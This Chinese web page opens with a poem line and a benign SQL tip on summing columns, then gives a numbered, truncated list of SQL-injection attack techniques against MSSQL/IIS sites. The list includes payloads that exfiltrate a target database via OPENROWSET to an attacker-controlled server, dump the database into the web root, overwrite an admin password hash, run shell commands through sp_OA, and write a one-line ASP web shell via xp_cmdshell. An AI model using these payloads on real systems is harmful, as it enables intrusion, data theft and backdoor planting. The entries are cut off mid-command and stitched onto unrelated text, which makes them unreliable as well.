叮咛你站在桥上看风景，看风景的人在楼上看你。明月装饰了你的窗子，你装饰了别人的梦。

使用sql语句对多个列进行求和.

sum语句的基本用法是:select sum(列名) as A_Name from Table_Name where ...

这样只能计算出某一列的数值的和;

如果要求多列的和,则可用:select sum(列名1+列名2+列名n) as A_Name from Table_Name where...

33、DB_OWNER权限下的数据库备份方法
用openrowset吧。反连到自己的数据库机器，~先在本地建个跟目标机器一样结构的表~字段类型使用nvarchar.然后用海洋连接对方的SQL数据库，在查询分析那里执行
insert into OPENROWSET ('sqloledb','server=你数据库服务器的IP;uid=user;pwd=pass;database=dbname;', 'select * from 你建立的表) select * from 对方的表&m...

30、sa 权限下已知web路径直接备份数据库到web路径下

http://www.XXXX.com/FullStory.asp?id=1;backuup database 数据库名 to disk='c:\inetpub\wwwroot\save.db' 则把得到的数据内容全部备份到WEB目录下，再用HTTP把此文件下载(当然首选要知道WEB虚拟目录)。

? 遍历系统的目录结构，分析结果并发现WEB虚拟目录，先创建一个临时表：temp
http...

21、win2000下将WEB用户提升为系统用户权限，需要有管理员的权限才能执行：
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\http...

20、寻找网站路径的方法汇总：
1）查看WEB网站安装目录命令：
? cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt （将2换成1、3、4、5试试）
type c:\test1.txt
del c:\test1.txt
在NBSI下可以直接显示运行结果，所以不用导出到文件

2）在网站上随便找到一个图片的名字 123.jp...

9、 用update来更新表中的数据：
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
www用户密码的16位MD5值为：a0b923820dcc509a，即把密码改成1；
32位MD5值为： ，密码为

10、 利用表内容导成文件功能
SQL有BCP命令，它可以把表的内容导成...

8、 不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令：
create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_o...

1、 用^转义字符来写ASP(一句话木马)文件的方法:
? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--

? echo ^<%ex...